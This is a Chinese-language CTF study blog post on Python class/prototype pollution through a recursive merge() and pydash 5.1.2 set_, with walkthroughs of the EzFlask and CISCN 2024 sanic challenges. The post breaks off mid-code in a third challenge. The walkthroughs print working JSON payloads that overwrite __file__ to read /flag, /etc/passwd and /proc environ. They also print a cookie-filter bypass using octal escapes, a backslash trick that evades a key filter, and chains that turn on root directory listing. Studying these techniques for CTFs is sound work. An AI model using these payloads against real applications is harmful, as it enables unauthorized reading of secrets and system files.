python原型链污染

​ 后面会有跟着Article_kelp慢慢操作的,前面先面向题目学习。

背景:

​ 国赛遇到了这个考点,然后之后的DASCTF夏季挑战赛也碰到了,抓紧粗略学一手,学了JavaScript之后再深究原型链污染。

简介:

​ python 中的原型链污染是指通过修改对象原型链中的属性,对程序的行为产生以外影响或利用漏洞进行攻击的一种技术。

​ 在 Python中,对象的属性和方法可以通过原型链继承来获取。每个对象都有一个原型,原型上定义了对象可以访问的属性和方法。当对象访问属性或方法时,会先在自身查找,如果找不到就会去原型链上的上级对象中查找,原型链污染攻击的思路是通过修改对象原型链中的属性,使得程序在访问属性或方法时得到不符合预期的结果。常见的原型链污染攻击包括修改内置对象的原型、修改全局对象的原型等

​ 这个知识点应用的范围比较小,仅当题目中出现utilsmergePydash(5.1.2)模块中的setset_with函数才会用上。

merge(没遇到过具体题型,先简单说下):

​ 首先是下面这个程序,可以再merge打个断点,debug试试看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
class father:
secret = "hello"
class son_a(father):
pass
class son_b(father):
pass
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
instance = son_b()
payload = {
"__class__" : {
"__base__" : {
"secret" : "world"
}
}
}
print(son_a.secret)
#hello
print(instance.secret)
#hello
merge(payload, instance)
print(son_a.secret)
#world
print(instance.secret)
#world
print(father.secret)
#world

​ 这就是一个简单的污染father类的secret属性的一个程序,可以看到的是,最后father.secret确实是被污染了。

​ 当然,内置属性例如 __str__,

特别注意:

​ 并不是所有的类的属性都可以被污染,如Object的属性就无法被污染,所以需要目标类能够被切入点类或对象可以通过属性值查找获取到

大佬是这么说的

通过断点调试可以看出这个merge函数在走到hasattr处,由于我们的payload是一层字典套一层字典,就会递归调用merge,并且由于getattr(dst,k),dst就在一直按着payload的键发生变化,从到类,再到父类,最后把父类的secret赋值为polluted,成功实现了原型链污染。

payload也很好理解,其实就是利用了python的链式继承关系,最后找到这个类即可,和SSTI通过链式继承关系找os模块很像。

类的内置属性,如__str__也可以被污染,但是需要注意,并不是所有类的属性都可以被污染,比如Object就无法被污染。

pydash(5.1.2):

​ 由于暂时不会Sanic框架的编写,所以先暂时用下flask框架, 差距应该不大。

​ 先看看下面这个代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pydash import set_

class Father:
secret_value = "safe"

class Pollution(object):
def __init__(self):
pass

pollutant = Pollution()
father = Father()

payload = {
"key" : "__class__.__init__.__globals__.father.secret_value",
"value" : "polluted"
}

key = payload["key"]
value = payload["value"]

print(father.secret_value)
#safe
set_(pollutant,key, value)
print(father.secret_value)
#polluted

​ 如上,我们最后成功污染了Father类的secret_value属性,大概思路就是通过 key 里的这个链子去找到 father.secret_value 这个属性,然后进行污染,污染为 value 的值。

​ 也正因为如此,所以写一个Web服务来试试看:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from flask import Flask
from pydash import set_
import json

app = Flask(__name__)

class Pollute:
def __init__(self):
pass

@app.route('/', methods=['GET', 'POST'])
def hello_world():
return open(__file__).read()

@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
payload = {
r"key": r"__init__.__globals__.__file__",
r"value": r"D:\html study\PyCharm Project\flask_pydash1\flag"
}
key = payload['key']
value = payload['value']
pollute = Pollute()
set_(pollute,key,value)
return "Finished pollute "


if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000,debug=True)

​ 不知为何,这里写的Web服务中,Pollution() 这里传入reqeust参数总是会出错,所以这里就用这种方式直接规定了key和value的值,作为一种输入方式。

​ 首先第一次访问根路由,得到的页面如下:

在这里插入图片描述

​ 之后,尝试访问下/pollute路由,返回了一个 Finished pollute ,随后再去访问下根路由,得到的如下:

在这里插入图片描述

​ 成功读取到了我提前准备的flag。

​ 原因就是因为在__globals__里找到了__file__属性,然后才能进行污染。

[DASCTF 2023 & 0X401七月暑期挑战赛]EzFlask:

​ (小声嘀咕):前面才刚说了没遇到merge的题,这就遇到了。

​ 首先,打开就是源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import uuid

from flask import Flask, request, session
from secret import black_list
import json

app = Flask(__name__)
app.secret_key = str(uuid.uuid4())

def check(data):
for i in black_list:
if i in data:
return False
return True

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class user():
def __init__(self):
self.username = ""
self.password = ""
pass
def check(self, data):
if self.username == data['username'] and self.password == data['password']:
return True
return False

Users = []

@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"

@app.route('/login',methods=['POST'])
def login():
if request.data:
try:
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Login Failed"
for user in Users:
if user.check(data):
session["username"] = data["username"]
return "Login Success"
except Exception:
return "Login Failed"
return "Login Failed"

@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

if __name__ == "__main__":
app.run(host="0.0.0.0", port=5010)

​ 审计一下,发现了几个点,首先是:

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

​ 就像最开始说的那样,存在merge函数,然后下一个有用的信息是:

1
2
3
@app.route('/',methods=['GET'])
def index():
return open(__file__, "r").read()

​ 读取了内置属性 __file__ 的值,最后一个重要的信息是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
@app.route('/register',methods=['POST'])
def register():
if request.data:
try:
if not check(request.data):
return "Register Failed"
data = json.loads(request.data)
if "username" not in data or "password" not in data:
return "Register Failed"
User = user()
merge(data, User)
Users.append(User)
except Exception:
return "Register Failed"
return "Register Success"
else:
return "Register Failed"

​ 这里发现,在该函数中调用了 merge() 函数,并且,data可控,那么,payload应该就显而易见了:

1
2
3
4
5
6
7
8
9
10
11
{
"username":"a",
"password":"b",
"__class__":{
"__init__":{
"__globals__":{
"__file__" : "/flag"#当flag在根目录下以及flag文件名知道的情况下
}
}
}
}

在这里插入图片描述

​ 但是,上传却失败了?(这儿可能会出现两个问题,除了黑名单本身的问题外,还有个重点问题,也会导致失败,就是一定要把Content-Type修改为application/json)看看这儿:

1
from secret import black_list

​ 虽然挺明显的,但还是很阴。很显然,在check函数下,有个与黑名单的比较,推测应该是这儿过不了,不过,当我们依次把那几个变量修改一下之后,发现,当__init__被修改成__int__后,返回的是 Register Success,所以,这里似乎只需要绕过__init__就行了,先做如下测试:

1
2
3
4
5
6
7
8
9
10
class A:
def __init__(self):
pass
def check(self):
pass

a = A()
print(a.__class__.check.__globals__)

#{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x00000122A3EB56D0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'D:\\html study\\PyCharm Project\\flask_pydash1\\test.py', '__cached__': None, 'A': <class '__main__.A'>, 'a': <__main__.A object at 0x00000122A405FA50>}

​ 发现我们可以通过对象的方法来获取__globals__全局变量,所以payload可以如下构造:

1
2
3
4
5
6
7
8
9
10
11
12
{
"username":"a",
"password":"b",
"__class__":{
"check":{
"__globals__":{
"__file__" : "/flag"
}
}
}
}

​ 但是最后读取根路由的时候出现了哥问题,那就是,flag文件名不对。

在这里插入图片描述

​ 令人窒息的操作。不过有一点儿或许有点儿希望,那就是环境变量,如果环境变量里面也没有的话,那我可就真没法了,说干就干,首先,环境变量可以通过 /proc/$PID/environ 来读取,这里推测有可能需要用到爆破。

在这里插入图片描述

​ 之后读取根路由:

在这里插入图片描述

​ 运气好,flag刚好就在环境变量里。flag如下:

1
flag{1084bd02-8273-4a0b-a490-08451805df3a}

[Ciscn2024 初赛] sanic

​ 根路由提示: where is my flag?,f12后发现提示了/src路由,访问后获得源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from sanic import Sanic
from sanic.response import text, html
from sanic_session import Session
import pydash
# pydash==5.1.2


class Pollute:
def __init__(self):
pass


app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)


@app.route('/', methods=['GET', 'POST'])
async def index(request):
return html(open('static/index.html').read())


@app.route("/login")
async def login(request):
user = request.cookies.get("user")
if user.lower() == 'adm;n':
request.ctx.session['admin'] = True
return text("login success")

return text("login fail")


@app.route("/src")
async def src(request):
return text(open(__file__).read())


@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
if request.ctx.session.get('admin') == True:
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and '_.' not in key:
pollute = Pollute()
pydash.set_(pollute, key, value)
return text("success")
else:
return text("forbidden")

return text("forbidden")


if __name__ == '__main__':
app.run(host='0.0.0.0')

​ 初步审一下逻辑,有用的信息如下:

1
2
3
@app.route("/src")
async def src(request):
return text(open(__file__).read())

​ 一眼看上去没什么,但是和下面这个结合起来就不一样了:

1
2
3
4
5
6
7
8
9
10
11
12
13
@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
if request.ctx.session.get('admin') == True:
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and '_.' not in key:
pollute = Pollute()
pydash.set_(pollute, key, value)
return text("success")
else:
return text("forbidden")

return text("forbidden")

​ 在admin这个路由中,可以清晰地看到pydash.set_()函数,结合上一个信息,应该是打python的原型链污染__file__来读文件,那么,还有个路由需要注意:

1
2
3
4
5
6
7
8
@app.route("/login")
async def login(request):
user = request.cookies.get("user")
if user.lower() == 'adm;n':
request.ctx.session['admin'] = True
return text("login success")

return text("login fail")

​ 这里可以发现的是,我们需要传入一个Cookie的值为user=adm;n 才行,但是,试过了,不行,为啥呢?

注意:以下为我个人分析方式,由于我本人异常菜鸡,所以很有可能是错误的,不可盲目相信。

​ 然后我们盯住user = request.cookies.get("user")这一行代码,对着cookie同时按住ctrl+左键,找到这一行内容,跟进:

在这里插入图片描述

​ 发现如下源码:

1
2
3
4
5
6
7
8
9
10
11
@property
def cookies(self) -> RequestParameters:
"""Incoming cookies on the request

Returns:
RequestParameters: Incoming cookies on the request
"""

if self.parsed_cookies is None:
self.get_cookies()
return cast(CookieRequestParameters, self.parsed_cookies)

​ 跟进 get_cookies()

1
2
3
4
def get_cookies(self) -> RequestParameters:
cookie = self.headers.getone("cookie", "")
self.parsed_cookies = CookieRequestParameters(parse_cookie(cookie))
return self.parsed_cookies

​ 这里审过前面那个对象,重要程度没有再跟进parse_cookie(cookie)高,所以跟进parse_cookie(cookie)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def parse_cookie(raw: str) -> Dict[str, List[str]]:
"""Parses a raw cookie string into a dictionary.

The function takes a raw cookie string (usually from HTTP headers) and
returns a dictionary where each key is a cookie name and the value is a
list of values for that cookie. The function handles quoted values and
skips invalid cookie names.

Args:
raw (str): The raw cookie string to be parsed.

Returns:
Dict[str, List[str]]: A dictionary containing the cookie names as keys
and a list of values for each cookie.

Example:
```python
raw = 'name1=value1; name2="value2"; name3=value3'
cookies = parse_cookie(raw)
# cookies will be {'name1': ['value1'], 'name2': ['value2'], 'name3': ['value3']}
"""  # noqa: E501
cookies: Dict[str, List[str]] = {}

for token in raw.split(";"):
    name, sep, value = token.partition("=")
    name = name.strip()
    value = value.strip()

    # Support cookies =value or plain value with no name
    # https://github.com/httpwg/http-extensions/issues/159
    if not sep:
        if not name:
            # Empty value like ;; or a cookie header with no value
            continue
        name, value = "", name

    if COOKIE_NAME_RESERVED_CHARS.search(name):  # no cov
        continue

    if len(value) > 2 and value[0] == '"' and value[-1] == '"':  # no cov
        value = _unquote(value)

    if name in cookies:
        cookies[name].append(value)
    else:
        cookies[name] = [value]

return cookies
1
2
3
4
5
6
7
8

​ 这里有一点需要注意:

```python
for token in raw.split(";"):
name, sep, value = token.partition("=")
name = name.strip()
value = value.strip()

​ 这个代码很显然是将分号前后分割成了两个字符串,也就是说,我们想要输入的Cookie: user=adm;n会变成user=adm以及n这两个串。

​ 根据这几行,大概可以发现最后返回的内容和什么有关了:

1
2
3
4
5
6
7
8
9
    if len(value) > 2 and value[0] == '"' and value[-1] == '"':  # no cov
value = _unquote(value)

if name in cookies:
cookies[name].append(value)
else:
cookies[name] = [value]

return cookies

​ 很明显,最终返回的是 cookies ,但是每次操作cookies都是增加的value参数,由此,根据 value = _unquote(value),这里跟进_unquote(value)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
def _unquote(str):  # no cov
if str is None or len(str) < 2:
return str
if str[0] != '"' or str[-1] != '"':
return str

str = str[1:-1]

i = 0
n = len(str)
res = []
while 0 <= i < n:
o_match = OCTAL_PATTERN.search(str, i)
q_match = QUOTE_PATTERN.search(str, i)
if not o_match and not q_match:
res.append(str[i:])
break
# else:
j = k = -1
if o_match:
j = o_match.start(0)
if q_match:
k = q_match.start(0)
if q_match and (not o_match or k < j):
res.append(str[i:k])
res.append(str[k + 1])
i = k + 2
else:
res.append(str[i:j])
res.append(chr(int(str[j + 1 : j + 4], 8))) # noqa: E203
i = j + 4
return "".join(res)

​ 感觉,这个就是我们最主要的利用的点。

​ 首先是这几行:

1
2
3
4
5
6
if str is None or len(str) < 2:
return str
if str[0] != '"' or str[-1] != '"':
return str

str = str[1:-1]

​ 判断传入的字符串(这里推测是user=XXXX中的XXXX),发现如果第一个字符不是两种引号,则直接返回,如果是引号,则掐头去尾,把引号去掉。之后的代码我不大会审,跑去问了下AI,可能有点儿智障,不过给了我一个方向,测试了一下,能成:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
i = 0
n = len(str)
res = []
while 0 <= i < n:
o_match = OCTAL_PATTERN.search(str, i)
q_match = QUOTE_PATTERN.search(str, i)
if not o_match and not q_match:
res.append(str[i:])
break
# else:
j = k = -1
if o_match:
j = o_match.start(0)
if q_match:
k = q_match.start(0)
if q_match and (not o_match or k < j):
res.append(str[i:k])
res.append(str[k + 1])
i = k + 2
else:
res.append(str[i:j])
res.append(chr(int(str[j + 1 : j + 4], 8))) # noqa: E203
i = j + 4

在这里插入图片描述

​ 后面还给了个它给写的改进的代码,不过就不放这儿了。

​ 根据这个答案猜想,可能是通过八进制进行的绕过,测试一下,访问下login路由,然后修改cookie的值为Cookie: user="adm\073n",之后试试看能否登陆成功?

在这里插入图片描述

​ 成功了 (≧▽≦)o

​ 这里它返回了个Session值,然后将它给的Session值写到请求头内,然后访问admin路由,发现并没有 给我们直接forbidden掉,说明成功了。之后就是正儿八经的原型链污染读文件了,第一波,先读一下,先来个第一个payload:

1
2
3
4
{
"key" : "__init__.__globals__.__file__",
"value" : "/etc/passwd"
}

​ 然而,恭喜了,每过,被forbidden了。回去看看,破案了,admin路由函数中存在这么一个比较:if key and value and type(key) is str and '_.' not in key:,这个就卡住我了。先来看下这几行:

1
2
3
4
5
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and '_.' not in key:
pollute = Pollute()
pydash.set_(pollute, key, value)

​ 似乎需要绕过的仅仅只有key中的 '_.'字符串,那么,需要的就是对key进行操作的地方应该重点观察,所以,上面这个代码应该重点看一看,当然, 前面的所有都没有用,最有用的只有pydash.set_(pollute, key, value),那么,没办法了,跟进set_()函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
def set_(obj, path, value):
"""
Sets the value of an object described by `path`. If any part of the object path doesn't exist,
it will be created.

Args:
obj (list|dict): Object to modify.
path (str | list): Target path to set value to.
value (mixed): Value to set.

Returns:
mixed: Modified `obj`.

Warning:
`obj` is modified in place.

Example:

>>> set_({}, 'a.b.c', 1)
{'a': {'b': {'c': 1}}}
>>> set_({}, 'a.0.c', 1)
{'a': {'0': {'c': 1}}}
>>> set_([1, 2], '[2][0]', 1)
[1, 2, [1]]
>>> set_({}, 'a.b[0].c', 1)
{'a': {'b': [{'c': 1}]}}

.. versionadded:: 2.2.0

.. versionchanged:: 3.3.0
Added :func:`set_` as main definition and :func:`deep_set` as alias.

.. versionchanged:: 4.0.0

- Modify `obj` in place.
- Support creating default path values as ``list`` or ``dict`` based on whether key or index
substrings are used.
- Remove alias ``deep_set``.
"""
return set_with(obj, path, value)

​ 算是,好消息吧,直接就看到了path,我们传入的key或许就是这个叫path的东西,毕竟那个链子看起来也很像是路径。好,没啥内容,跟进set_with(obj, path, value)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def set_with(obj, path, value, customizer=None):
"""
This method is like :func:`set_` except that it accepts customizer which is invoked to produce
the objects of path. If customizer returns undefined path creation is handled by the method
instead. The customizer is invoked with three arguments: ``(nested_value, key, nested_object)``.

Args:
obj (list|dict): Object to modify.
path (str | list): Target path to set value to.
value (mixed): Value to set.
customizer (callable, optional): The function to customize assigned values.

Returns:
mixed: Modified `obj`.

Warning:
`obj` is modified in place.

Example:

>>> set_with({}, '[0][1]', 'a', lambda: {})
{0: {1: 'a'}}

.. versionadded:: 4.0.0

.. versionchanged:: 4.3.1
Fixed bug where a callable `value` was called when being set.
"""
return update_with(obj, path, pyd.constant(value), customizer=customizer)

​ 盯着path,继续跟进:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
def update_with(obj, path, updater, customizer=None):  # noqa: C901
"""
This method is like :func:`update` except that it accepts customizer which is invoked to produce
the objects of path. If customizer returns ``None``, path creation is handled by the method
instead. The customizer is invoked with three arguments: ``(nested_value, key, nested_object)``.

Args:
obj (list|dict): Object to modify.
path (str|list): A string or list of keys that describe the object path to modify.
updater (callable): Function that returns updated value.
customizer (callable, optional): The function to customize assigned values.

Returns:
mixed: Updated `obj`.

Warning:
`obj` is modified in place.

Example:

>>> update_with({}, '[0][1]', lambda: 'a', lambda: {})
{0: {1: 'a'}}

.. versionadded:: 4.0.0
"""
if not callable(updater):
updater = pyd.constant(updater)

if customizer is not None and not callable(customizer):
call_customizer = partial(callit, clone, customizer, argcount=1)
elif customizer:
call_customizer = partial(callit, customizer, argcount=getargcount(customizer, maxargs=3))
else:
call_customizer = None

default_type = dict if isinstance(obj, dict) else list
tokens = to_path_tokens(path)

if not pyd.is_list(tokens): # pragma: no cover
tokens = [tokens]

last_key = pyd.last(tokens)

if isinstance(last_key, PathToken):
last_key = last_key.key

target = obj

for idx, token in enumerate(pyd.initial(tokens)):
if isinstance(token, PathToken):
key = token.key
default_factory = pyd.get(tokens, [idx + 1, "default_factory"], default=default_type)
else:
key = token
default_factory = default_type

obj_val = base_get(target, key, default=None)
path_obj = None

if call_customizer:
path_obj = call_customizer(obj_val, key, target)

if path_obj is None:
path_obj = default_factory()

base_set(target, key, path_obj, allow_override=False)

try:
target = base_get(target, key, default=None)
except TypeError as exc: # pragma: no cover
try:
target = target[int(key)]
_failed = False
except Exception:
_failed = True

if _failed:
raise TypeError(f"Unable to update object at index {key!r}. {exc}")

value = base_get(target, last_key, default=None)
base_set(target, last_key, callit(updater, value))

return obj

​ 继续跟进path,似乎整个函数里就只有一个:tokens = to_path_tokens(path),还是无脑根:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def to_path_tokens(value):
"""Parse `value` into :class:`PathToken` objects."""
if pyd.is_string(value) and ("." in value or "[" in value):
# Since we can't tell whether a bare number is supposed to be dict key or a list index, we
# support a special syntax where any string-integer surrounded by brackets is treated as a
# list index and converted to an integer.
keys = [
PathToken(int(key[1:-1]), default_factory=list)
if RE_PATH_LIST_INDEX.match(key)
else PathToken(unescape_path_key(key), default_factory=dict)
for key in filter(None, RE_PATH_KEY_DELIM.split(value))
]
elif pyd.is_string(value) or pyd.is_number(value):
keys = [PathToken(value, default_factory=dict)]
elif value is UNSET:
keys = []
else:
keys = value

return keys

​ 这儿不知道怎么操作了,但是跟进 RE_PATH_KEY_DELIM后得到了个正则表达式:

1
RE_PATH_KEY_DELIM = re.compile(r"(?<!\\)(?:\\\\)*\.|(\[\d+\])")

​ 问了下ai,ai的回复中有一点儿值得注意:

请注意,这个正则表达式在处理复杂的转义序列时可能不是完美的,特别是当字符串中包含连续的转义字符(如 \\\\.),这些字符可能意图表示一个实际的点号但前面有偶数个反斜杠。此外,如果点号后面紧跟的是字母或其他非数字字符,它仍然会被匹配为分隔符,即使这可能不是预期的。

​ 我个人已经别无他法了,照着它给的这个这\\\\.试着绕了一下,结果成功了,payload如下:

1
2
3
4
{
"key" : "__init__\\\\.__globals__\\\\.__file__",
"value" : "/etc/passwd"
}

​ 访问src路由,成功读取到了文件:

在这里插入图片描述

​ 好了,照理来说,这个题目如果这样的话已经成功了,利用如下payload直接读取进程的环境变量即可:

1
2
3
4
{
"key" : "__init__\\\\.__globals__\\\\.__file__",
"value" : "/proc/1/environ"
}

在这里插入图片描述

​ 但是,看了下大佬们的wp似乎有另一种姿势,算是一种非预期吧。

下面跟着大佬们走:

​ 先看如下位置:

1
2
3
app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)

​ 跟进 static(),得到如下内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
def static(
self,
uri: str,
file_or_directory: Union[PathLike, str],
pattern: str = r"/?.+",
use_modified_since: bool = True,
use_content_range: bool = False,
stream_large_files: Union[bool, int] = False,
name: str = "static",
host: Optional[str] = None,
strict_slashes: Optional[bool] = None,
content_type: Optional[str] = None,
apply: bool = True,
resource_type: Optional[str] = None,
index: Optional[Union[str, Sequence[str]]] = None,
directory_view: bool = False,
directory_handler: Optional[DirectoryHandler] = None,
):
"""Register a root to serve files from. The input can either be a file or a directory.

This method provides an easy and simple way to set up the route necessary to serve static files.

Args:
uri (str): URL path to be used for serving static content.
file_or_directory (Union[PathLike, str]): Path to the static file
or directory with static files.
pattern (str, optional): Regex pattern identifying the valid
static files. Defaults to `r"/?.+"`.
use_modified_since (bool, optional): If true, send file modified
time, and return not modified if the browser's matches the
server's. Defaults to `True`.
use_content_range (bool, optional): If true, process header for
range requests and sends the file part that is requested.
Defaults to `False`.
stream_large_files (Union[bool, int], optional): If `True`, use
the `StreamingHTTPResponse.file_stream` handler rather than
the `HTTPResponse.file handler` to send the file. If this
is an integer, it represents the threshold size to switch
to `StreamingHTTPResponse.file_stream`. Defaults to `False`,
which means that the response will not be streamed.
name (str, optional): User-defined name used for url_for.
Defaults to `"static"`.
host (Optional[str], optional): Host IP or FQDN for the
service to use.
strict_slashes (Optional[bool], optional): Instruct Sanic to
check if the request URLs need to terminate with a slash.
content_type (Optional[str], optional): User-defined content type
for header.
apply (bool, optional): If true, will register the route
immediately. Defaults to `True`.
resource_type (Optional[str], optional): Explicitly declare a
resource to be a `"file"` or a `"dir"`.
index (Optional[Union[str, Sequence[str]]], optional): When
exposing against a directory, index is the name that will
be served as the default file. When multiple file names are
passed, then they will be tried in order.
directory_view (bool, optional): Whether to fallback to showing
the directory viewer when exposing a directory. Defaults
to `False`.
directory_handler (Optional[DirectoryHandler], optional): An
instance of DirectoryHandler that can be used for explicitly
controlling and subclassing the behavior of the default
directory handler.

Returns:
List[sanic.router.Route]: Routes registered on the router.

Examples:
Serving a single file:
```python
app.static('/foo', 'path/to/static/file.txt')
        Serving all files from a directory:
        
1
app.static('/static', 'path/to/static/directory')
Serving large files with a specific threshold:
1
app.static('/static', 'path/to/large/files', stream_large_files=1000000)
""" # noqa: E501 name = self.generate_name(name) if strict_slashes is None and self.strict_slashes is not None: strict_slashes = self.strict_slashes if not isinstance(file_or_directory, (str, bytes, PurePath)): raise ValueError( f"Static route must be a valid path, not {file_or_directory}" ) try: file_or_directory = Path(file_or_directory).resolve() except TypeError: raise TypeError( "Static file or directory must be a path-like object or string" ) if directory_handler and (directory_view or index): raise ValueError( "When explicitly setting directory_handler, you cannot " "set either directory_view or index. Instead, pass " "these arguments to your DirectoryHandler instance." ) if not directory_handler: directory_handler = DirectoryHandler( uri=uri, directory=file_or_directory, directory_view=directory_view, index=index, ) static = FutureStatic( uri, file_or_directory, pattern, use_modified_since, use_content_range, stream_large_files, name, host, strict_slashes, content_type, resource_type, directory_handler, ) self._future_statics.add(static) if apply: self._apply_static(static)
1
2
3
4
5
6
7
8
9
10
11

​ 注释里面存在这两句话:

```tex
directory_view (bool, optional): Whether to fallback to showing
the directory viewer when exposing a directory. Defaults
to `False`.
directory_handler (Optional[DirectoryHandler], optional): An
instance of DirectoryHandler that can be used for explicitly
controlling and subclassing the behavior of the default
directory handler.

​ 大致意思就是directory_view为True时,会开启列目录功能,directory_handler中可以获取指定的目录。跟进下directory_handler ,如下:

1
2
3
4
5
6
7
if not directory_handler:
directory_handler = DirectoryHandler(
uri=uri,
directory=file_or_directory,
directory_view=directory_view,
index=index,
)

​ 再跟进DirectoryHandler,发现如下

1
2
3
4
5
6
7
def __init__(
self,
uri: str,
directory: Path,
directory_view: bool = False,
index: Optional[Union[str, Sequence[str]]] = None,
) -> None:

​ 我们发现只要我们将directory污染为根目录,directory_view污染为True,就可以看到根目录的所有文件了。

后续我在Windows上测试次次运行不了,这里就直接借一下大佬们的代码在这儿,我就不实操了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from sanic import Sanic
from sanic.response import text, html
#from sanic_session import Session
import sys
import pydash
# pydash==5.1.2


class Pollute:
def __init__(self):
pass


app = Sanic(__name__)
app.static("/static/", "./static/")
#Session(app)


#@app.route('/', methods=['GET', 'POST'])
#async def index(request):
#return html(open('static/index.html').read())


#@app.route("/login")
#async def login(request):
#user = request.cookies.get("user")
#if user.lower() == 'adm;n':
#request.ctx.session['admin'] = True
#return text("login success")

#return text("login fail")


@app.route("/src")
async def src(request):
print(app.router.name_index)
return text(open(__file__).read())


@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and '_.' not in key:
pollute = Pollute()
pydash.set_(pollute, key, value)
return text("success")
else:
return text("forbidden")

#print(app.router.name_index['name'].directory_view)

if __name__ == '__main__':
app.run(host='0.0.0.0')

​ 输出应该接近这样:

在这里插入图片描述

​ 看出来了路由是 "__mp_main__.static",之后,就可以直接一把梭了(具体链子怎么找,参考gxngxngxn大佬的文章):

1
2
3
4
{
"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory_view",
"value": 1
}

​ 上面的payload是开启目录功能。

1
{"key":"__class__\\\\.__init__\\\\.__globals__\\\\.app.router.name_index.__mp_main__\\.static.handler.keywords.directory_handler.directory._parts","value": ["/"]}

​ 这个payload是将指定目录污染为根目录,之后访问/static/目录,就能看到根目录下开始的所有文件的文件名了/

1
{"key":"__init__\\\\.__globals__\\\\.__file__","value": "/flag文件名字"}

​ 这个payload是用来读flag文件的,之后访问src路由即可获得flag。

[DASCTF2024夏季挑战赛]Sanic’s revenge

​ 题目给了个附件,下载下来直接开始审:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from sanic import Sanic
import os
from sanic.response import text, html
import sys
import random
import pydash
# pydash==5.1.2

# 这里的源码好像被admin删掉了一些,听他说里面藏有大秘密
class Pollute:
def __init__(self):
pass

app = Sanic(__name__)
app.static("/static/", "./static/")

@app.route("/*****secret********")
async def secret(request):
secret='**************************'
return text("can you find my route name ???"+secret)

@app.route('/', methods=['GET', 'POST'])
async def index(request):
return html(open('static/index.html').read())

@app.route("/pollute", methods=['GET', 'POST'])
async def POLLUTE(request):
key = request.json['key']
value = request.json['value']
if key and value and type(key) is str and 'parts' not in key and 'proc' not in str(value) and type(value) is not list:
pollute = Pollute()
pydash.set_(pollute, key, value)
return text("success")
else:
log_dir = create_log_dir(6)
log_dir_bak = log_dir + ".."
log_file = "/tmp/" + log_dir + "/access.log"
